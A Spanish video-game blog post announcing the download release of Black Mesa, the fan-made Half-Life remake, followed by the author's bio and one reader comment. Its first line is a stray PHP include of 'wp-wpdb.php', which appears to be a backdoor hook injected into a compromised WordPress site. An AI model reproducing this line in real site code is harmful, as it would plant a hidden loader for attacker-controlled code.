if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); El remake "no oficial" de Half Life ve el final del túnel (YA DISPONIBLE) – La Fortaleza de LeChuck

El remake "no oficial" de Half Life ve el final del túnel (YA DISPONIBLE)

Desde la salida de Half Life 2, unos fans de la saga decidieron comenzar un proyecto para rehacer la primera y más valorada parte de Half Life con la calidad técnica de su segunda parte, y ese proyecto se llama «Black Mesa«.

No se puede decir que fuera un proyecto fácil, y tampoco que hayan podido poner todos sus recursos en hacer este sueño realidad. Hablamos de un «remake» que dió comienzo en el año 2004, y hace unos días fue cuando saltó la noticia en su foro oficial, el proyecto estaba llegando a su fin, el Duke Nukem Forever de los fanmades por fin está disponible(como también sucedió con nuestro amigo Duke) . Podemos abrir boca con este trailer de Black Mesa Source de hace 3 años para saber que nos espera, mientras descargamos este Mod Black Mesa totalmente gratuito.

Particularmente no he jugado a la primera parte de Half Life y sí a la segunda, y seguramente es porque esos primeros FPS en 3D poligonales han envejecido bastante mal. Teniendo esta oportunidad en mis manos, y teniendo comprado el original en Steam, no dudéis que esta si será la oportunidad para gozar de esta gran saga en su totalidad. Al menos hasta que por fin se anuncie o se vea algo en firme del esperado y rumoreado incesantemente Half Life 3.
Para descargar «Black Mesa» haced click en su página oficial. Tienen disponibles varios enlaces e incluso vía torrent.
Publicada el
Categorizado como Uncategorized

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

1 comentario

  1. Por fiiiin! Siiiii! Como bien dices, es increible como conserva su jugabilidad. Yo, aun a dia de hoy, sigo jugándolo de vez en cuando y no me canso. Espero que este lavado de cara sirva a aquellos que no conozcan el origen de esta gran saga.

Dejar un comentario